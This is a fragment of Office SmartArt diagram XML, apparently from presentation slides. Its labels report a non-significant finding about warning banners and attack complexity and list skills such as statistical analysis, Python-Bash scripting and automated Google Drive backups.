    <dgm:cxn modelId="{B3DA5BAD-906A-4FAA-BC6A-F4EA4D04825B}" type="presParOf" srcId="{A2176D51-18DC-C841-A3B2-72E81D6F53A5}" destId="{59D15110-37BA-2342-8D59-E350651F634E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{1417D288-B166-4C7E-BCE7-4A5B81E33A60}" type="presParOf" srcId="{A3F19C8F-C4DA-3F40-AA46-24979878A171}" destId="{6712454E-1A52-0B46-9280-A8F093592677}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{22F562AF-CE03-459A-8BFA-409D5AB00DC6}" type="presParOf" srcId="{A3F19C8F-C4DA-3F40-AA46-24979878A171}" destId="{D56C6E3E-4119-BA4F-81AF-FB5D5A43A5DE}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B1A26053-9DEF-48AB-BC4C-3FF6CE21F6C9}" type="presParOf" srcId="{D56C6E3E-4119-BA4F-81AF-FB5D5A43A5DE}" destId="{A64D9D74-5824-DA4C-8009-A253B457153E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0A1907C2-A73A-4D3F-89C7-A2E6F4DBF827}" type="presParOf" srcId="{D56C6E3E-4119-BA4F-81AF-FB5D5A43A5DE}" destId="{070D4DCD-2ECC-0F48-81F0-8F2146032A06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ACC46-1D5B-4400-901D-2B3251755CB4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A6340F3-C2FF-4839-85E0-D2C1D9494D86}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent5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algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>There is no significant difference in complexity of an attack based on the warning banner used </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{087119AC-6CFA-4F8A-9F25-0583DFD4EBA8}" type="parTrans" cxnId="{4757B525-63BD-4468-AB75-21B85587127D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A43C75A8-822A-4588-A812-0AA8C556A23D}" type="sibTrans" cxnId="{4757B525-63BD-4468-AB75-21B85587127D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90214819-A94A-4DFE-BB2B-ABEA8A262060}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Failed to reject the null hypothesis</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4BB2ED5-D0A7-414D-BEDD-4A52FE7851A8}" type="parTrans" cxnId="{E8049344-27F5-4C4A-A1C8-994C71FA676E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47F6A757-867D-429E-BA5A-A8B608211AEC}" type="sibTrans" cxnId="{E8049344-27F5-4C4A-A1C8-994C71FA676E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{544A94A3-C1E3-5943-891E-FD0880EEB235}" type="pres">
      <dgm:prSet presAssocID="{663ACC46-1D5B-4400-901D-2B3251755CB4}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DEFB1A0D-34AB-814C-8787-7AA8029B3A04}" type="pres">
      <dgm:prSet presAssocID="{5A6340F3-C2FF-4839-85E0-D2C1D9494D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78039B-D1A5-9E48-B8F6-9D88763BF2DC}" type="pres">
      <dgm:prSet presAssocID="{A43C75A8-822A-4588-A812-0AA8C556A23D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DF2830F-5E0F-F14D-8791-1EA9CA4536F4}" type="pres">
      <dgm:prSet presAssocID="{90214819-A94A-4DFE-BB2B-ABEA8A2620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6CDC04-920E-ED48-AE76-DA7B1428C314}" type="presOf" srcId="{90214819-A94A-4DFE-BB2B-ABEA8A262060}" destId="{0DF2830F-5E0F-F14D-8791-1EA9CA4536F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4757B525-63BD-4468-AB75-21B85587127D}" srcId="{663ACC46-1D5B-4400-901D-2B3251755CB4}" destId="{5A6340F3-C2FF-4839-85E0-D2C1D9494D86}" srcOrd="0" destOrd="0" parTransId="{087119AC-6CFA-4F8A-9F25-0583DFD4EBA8}" sibTransId="{A43C75A8-822A-4588-A812-0AA8C556A23D}"/>
    <dgm:cxn modelId="{30E7503D-3E3C-0648-908E-971D8CD73ACC}" type="presOf" srcId="{663ACC46-1D5B-4400-901D-2B3251755CB4}" destId="{544A94A3-C1E3-5943-891E-FD0880EEB235}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E8049344-27F5-4C4A-A1C8-994C71FA676E}" srcId="{663ACC46-1D5B-4400-901D-2B3251755CB4}" destId="{90214819-A94A-4DFE-BB2B-ABEA8A262060}" srcOrd="1" destOrd="0" parTransId="{D4BB2ED5-D0A7-414D-BEDD-4A52FE7851A8}" sibTransId="{47F6A757-867D-429E-BA5A-A8B608211AEC}"/>
    <dgm:cxn modelId="{DA23BF72-1263-7249-888B-E96F54FD0532}" type="presOf" srcId="{5A6340F3-C2FF-4839-85E0-D2C1D9494D86}" destId="{DEFB1A0D-34AB-814C-8787-7AA8029B3A04}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4FB1EF0F-6A10-9543-B297-BE30EFE3D54E}" type="presParOf" srcId="{544A94A3-C1E3-5943-891E-FD0880EEB235}" destId="{DEFB1A0D-34AB-814C-8787-7AA8029B3A04}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{26BB61F3-449C-B849-BA33-2E54FD1889F0}" type="presParOf" srcId="{544A94A3-C1E3-5943-891E-FD0880EEB235}" destId="{9978039B-D1A5-9E48-B8F6-9D88763BF2DC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9369D8D2-089B-AC4D-B8D2-D63994BF3225}" type="presParOf" srcId="{544A94A3-C1E3-5943-891E-FD0880EEB235}" destId="{0DF2830F-5E0F-F14D-8791-1EA9CA4536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F7669F-24E8-4252-95D8-27A346BF784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EFEA43-DAFC-427D-A94A-2B3B55E0EB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New statistical tools and methods for analysis</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{741147AC-D1EF-4B3E-9CB4-7D14A211154F}" type="parTrans" cxnId="{9F2F7162-B2D4-4C9A-80AD-0DE8F5E5B917}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF6C9E2D-ED5A-46C7-B255-7C77019C401F}" type="sibTrans" cxnId="{9F2F7162-B2D4-4C9A-80AD-0DE8F5E5B917}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D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Connecting Python and Bash scripts</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CADE35D5-FC99-4E79-98CA-4798BB4AAAFC}" type="parTrans" cxnId="{77131887-2A5A-4C70-A8F0-E52F8B9AB72B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B07CC436-3243-400C-A130-07A719B243E3}" type="sibTrans" cxnId="{77131887-2A5A-4C70-A8F0-E52F8B9AB72B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA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Automatically backing up data to Google Drive and Sheets</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7EDAA73-A34E-4CC4-B549-C6283792C2BA}" type="parTrans" cxnId="{6CFC0D27-4398-49F1-B197-17ECACBEE46F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E55B4B5-16EA-4EB6-B270-9907EE5E501E}" type="sibTrans" cxnId="{6CFC0D27-4398-49F1-B197-17ECACBEE46F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD72BBE5-5D0B-4B49-AAD4-786DE2A628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management and adapting to feedback</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DA9368E-E067-4F78-B645-1F9A2623B474}" type="parTrans" cxnId="{EE34B4E1-5F19-463B-9339-A47F5F4AA691}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37877E3A-9C95-400D-8BB3-2069A10AA6E3}" type="sibTrans" cxnId="{EE34B4E1-5F19-463B-9339-A47F5F4AA691}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" type="pres">
      <dgm:prSet presAssocID="{AEF7669F-24E8-4252-95D8-27A346BF784B}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C533E77-DE78-43E0-A50F-E7C1CD84B84A}" type="pres">
      <dgm:prSet presAssocID="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB6F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0CD02B8-0232-4932-B953-EBB98C71C501}" type="pres">
      <dgm:prSet presAssocID="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB6F}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F369554-6532-44CF-9E36-194BB6B8EFB6}" type="pres">
      <dgm:prSet presAssocID="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB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415C42-F5E3-455E-B3C6-9C539AA1EC6B}" type="pres">
      <dgm:prSet presAssocID="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB6F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44E19F86-23AC-41B4-BF3B-F116968C11FA}" type="pres">
      <dgm:prSet presAssocID="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB6F}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B6F008C-6339-4256-B32C-746286FED7CA}" type="pres">
      <dgm:prSet presAssocID="{DF6C9E2D-ED5A-46C7-B255-7C77019C401F}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D25E8F0A-6336-4671-B644-532E9975E454}" type="pres">
      <dgm:prSet presAssocID="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D60}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F3C06DD-0812-48BD-BB9F-DBEB2A6E4B80}" type="pres">
      <dgm:prSet presAssocID="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D60}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6BB32D54-5BB9-412B-8FD5-C82ADFBB274D}" type="pres">
      <dgm:prSet presAssocID="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D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F25C426-0B32-45B1-93E1-44CE6CD41232}" type="pres">
      <dgm:prSet presAssocID="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D60}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCBFF698-5553-4C70-922E-5EF892343AA7}" type="pres">
      <dgm:prSet presAssocID="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D60}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A67A1FB4-F780-4C62-8413-AE7999F04A8D}" type="pres">
      <dgm:prSet presAssocID="{B07CC436-3243-400C-A130-07A719B243E3}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{949C4786-BE72-4410-90F9-693284080F62}" type="pres">
      <dgm:prSet presAssocID="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA1C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F8692A68-B2BC-422E-8E86-CEEE6BC411D0}" type="pres">
      <dgm:prSet presAssocID="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA1C}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{066BF40C-0ED4-4D99-9799-A6C69B7153FC}" type="pres">
      <dgm:prSet presAssocID="{BEBEA78F-0B3E-4546-8E5A-C5DA4576D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8F25EF-DFF1-4769-9190-D37B8ED2A417}" type="pres">
      <dgm:prSet presAssocID="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA1C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5DFC4B4-4A53-4C5A-B66E-16991C790098}" type="pres">
      <dgm:prSet presAssocID="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA1C}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29A7C71B-6777-4A84-8E68-969C1DAB8A71}" type="pres">
      <dgm:prSet presAssocID="{5E55B4B5-16EA-4EB6-B270-9907EE5E501E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F378732-FC15-4BDA-8D72-2A60F4F986FB}" type="pres">
      <dgm:prSet presAssocID="{DD72BBE5-5D0B-4B49-AAD4-786DE2A62835}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0FCF3BFF-15C0-4B80-A727-9A113B35883E}" type="pres">
      <dgm:prSet presAssocID="{DD72BBE5-5D0B-4B49-AAD4-786DE2A62835}" presName="iconBgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D1E60794-F92C-4ADE-91B9-7B234B024FE6}" type="pres">
      <dgm:prSet presAssocID="{DD72BBE5-5D0B-4B49-AAD4-786DE2A628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F483C83-1AF1-4488-974E-5463886D67A4}" type="pres">
      <dgm:prSet presAssocID="{DD72BBE5-5D0B-4B49-AAD4-786DE2A62835}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B601742-BA1B-4C4D-9F28-0C58CF20CF43}" type="pres">
      <dgm:prSet presAssocID="{DD72BBE5-5D0B-4B49-AAD4-786DE2A628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FC0D27-4398-49F1-B197-17ECACBEE46F}" srcId="{AEF7669F-24E8-4252-95D8-27A346BF784B}" destId="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA1C}" srcOrd="2" destOrd="0" parTransId="{E7EDAA73-A34E-4CC4-B549-C6283792C2BA}" sibTransId="{5E55B4B5-16EA-4EB6-B270-9907EE5E501E}"/>
    <dgm:cxn modelId="{0B67E733-8816-0D40-8642-9C30A5951965}" type="presOf" srcId="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D60}" destId="{BCBFF698-5553-4C70-922E-5EF892343AA7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{2E44823B-B71D-4C47-A7FC-0F6441F43431}" type="presOf" srcId="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB6F}" destId="{44E19F86-23AC-41B4-BF3B-F116968C11FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9F2F7162-B2D4-4C9A-80AD-0DE8F5E5B917}" srcId="{AEF7669F-24E8-4252-95D8-27A346BF784B}" destId="{A4EFEA43-DAFC-427D-A94A-2B3B55E0EB6F}" srcOrd="0" destOrd="0" parTransId="{741147AC-D1EF-4B3E-9CB4-7D14A211154F}" sibTransId="{DF6C9E2D-ED5A-46C7-B255-7C77019C401F}"/>
    <dgm:cxn modelId="{1E7F0876-5E04-8544-B909-1F11FDC72CEF}" type="presOf" srcId="{AEF7669F-24E8-4252-95D8-27A346BF784B}" destId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{77131887-2A5A-4C70-A8F0-E52F8B9AB72B}" srcId="{AEF7669F-24E8-4252-95D8-27A346BF784B}" destId="{CFEF1C05-4F4A-4A13-8B0A-D1C09A3A1D60}" srcOrd="1" destOrd="0" parTransId="{CADE35D5-FC99-4E79-98CA-4798BB4AAAFC}" sibTransId="{B07CC436-3243-400C-A130-07A719B243E3}"/>
    <dgm:cxn modelId="{08B4B493-B29C-DE41-B6D8-979731AF689E}" type="presOf" srcId="{BEBEA78F-0B3E-4546-8E5A-C5DA4576DA1C}" destId="{C5DFC4B4-4A53-4C5A-B66E-16991C790098}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EDE6E49B-A395-3B47-A2D9-81BB8FB7A4B5}" type="presOf" srcId="{DD72BBE5-5D0B-4B49-AAD4-786DE2A62835}" destId="{5B601742-BA1B-4C4D-9F28-0C58CF20CF43}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EE34B4E1-5F19-463B-9339-A47F5F4AA691}" srcId="{AEF7669F-24E8-4252-95D8-27A346BF784B}" destId="{DD72BBE5-5D0B-4B49-AAD4-786DE2A62835}" srcOrd="3" destOrd="0" parTransId="{0DA9368E-E067-4F78-B645-1F9A2623B474}" sibTransId="{37877E3A-9C95-400D-8BB3-2069A10AA6E3}"/>
    <dgm:cxn modelId="{6B934ACE-188C-9F49-B14D-1E1179E0C29E}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{4C533E77-DE78-43E0-A50F-E7C1CD84B84A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{31B4A25D-47E1-524C-A400-B8960680DA9D}" type="presParOf" srcId="{4C533E77-DE78-43E0-A50F-E7C1CD84B84A}" destId="{C0CD02B8-0232-4932-B953-EBB98C71C501}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{498CDE4E-9569-5F44-8CF5-22541BD28BD0}" type="presParOf" srcId="{4C533E77-DE78-43E0-A50F-E7C1CD84B84A}" destId="{1F369554-6532-44CF-9E36-194BB6B8EFB6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{71F3841A-57FB-9A49-947A-E82DAFCA2CB2}" type="presParOf" srcId="{4C533E77-DE78-43E0-A50F-E7C1CD84B84A}" destId="{67415C42-F5E3-455E-B3C6-9C539AA1EC6B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6A545467-615D-2E4F-B67F-12689E3A7C47}" type="presParOf" srcId="{4C533E77-DE78-43E0-A50F-E7C1CD84B84A}" destId="{44E19F86-23AC-41B4-BF3B-F116968C11FA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{B2210304-F780-1744-9A76-2A16EE8D94D6}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{6B6F008C-6339-4256-B32C-746286FED7CA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{E73BE02A-261B-8348-80AC-E4681095B926}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{D25E8F0A-6336-4671-B644-532E9975E454}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{77EDF04A-30F0-864D-9DFD-729DEB9A43AA}" type="presParOf" srcId="{D25E8F0A-6336-4671-B644-532E9975E454}" destId="{6F3C06DD-0812-48BD-BB9F-DBEB2A6E4B80}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{AF19C0D4-4BBA-B34B-99A0-83448FEEA81E}" type="presParOf" srcId="{D25E8F0A-6336-4671-B644-532E9975E454}" destId="{6BB32D54-5BB9-412B-8FD5-C82ADFBB274D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{E5C8B430-B4BD-9A4E-B127-D07D60DEABB6}" type="presParOf" srcId="{D25E8F0A-6336-4671-B644-532E9975E454}" destId="{8F25C426-0B32-45B1-93E1-44CE6CD41232}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{EF0A0CB1-46C1-D84C-8136-F80D438B680B}" type="presParOf" srcId="{D25E8F0A-6336-4671-B644-532E9975E454}" destId="{BCBFF698-5553-4C70-922E-5EF892343AA7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{E9633C15-617C-0F4E-B23D-C43C39015799}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{A67A1FB4-F780-4C62-8413-AE7999F04A8D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{08A7DCC5-CF5E-9F43-8D21-093753D4FCEC}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{949C4786-BE72-4410-90F9-693284080F62}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{5999D226-BFDD-1A47-8B81-D3E9DABADD0B}" type="presParOf" srcId="{949C4786-BE72-4410-90F9-693284080F62}" destId="{F8692A68-B2BC-422E-8E86-CEEE6BC411D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{69A337F9-8E85-AB49-86E2-F6C10CB22187}" type="presParOf" srcId="{949C4786-BE72-4410-90F9-693284080F62}" destId="{066BF40C-0ED4-4D99-9799-A6C69B7153FC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{83BACEA3-D3AF-5547-9591-4BC3772EE934}" type="presParOf" srcId="{949C4786-BE72-4410-90F9-693284080F62}" destId="{B88F25EF-DFF1-4769-9190-D37B8ED2A417}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{1D274C52-6924-C54E-A5F8-1A0D2C46B9A3}" type="presParOf" srcId="{949C4786-BE72-4410-90F9-693284080F62}" destId="{C5DFC4B4-4A53-4C5A-B66E-16991C790098}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{6E41D64A-9A94-F64E-9F0E-F766ADF811CC}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{29A7C71B-6777-4A84-8E68-969C1DAB8A71}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{9B7CF993-F2FE-7247-9B35-1CED54617F56}" type="presParOf" srcId="{29A94D5F-6277-4D55-8E89-5CF3752CC0CE}" destId="{5F378732-FC15-4BDA-8D72-2A60F4F986FB}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{FB6CB506-0A08-B243-BA63-5F55BA726DB6}" type="presParOf" srcId="{5F378732-FC15-4BDA-8D72-2A60F4F986FB}" destId="{0FCF3BFF-15C0-4B80-A727-9A113B35883E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{16419B24-5219-E641-A0A8-FA1AE50C7B7A}" type="presParOf" srcId="{5F378732-FC15-4BDA-8D72-2A60F4F986FB}" destId="{D1E60794-F92C-4ADE-91B9-7B234B024FE6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{C70BDA42-B16E-4244-B511-C85A3D3CDEF8}" type="presParOf" srcId="{5F378732-FC15-4BDA-8D72-2A60F4F986FB}" destId="{6F483C83-1AF1-4488-974E-5463886D67A4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/IconCircleLabelList"/>
    <dgm:cxn modelId="{FC0C9CAD-6038-8C4F-B978-2DFF6EB846B4}" type="presParOf" srcId="{5F378732-FC15-4BDA-8D72-2A60F4F986FB}" destId="{5B601742-BA1B-4C4D-9F28-0C58CF20CF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9718E-A055-2D43-87B0-CF0B20E7811B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="516911"/>
          <a:ext cx="2063762" cy="13104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55872-ADAE-504B-8937-442C9D31AB63}">
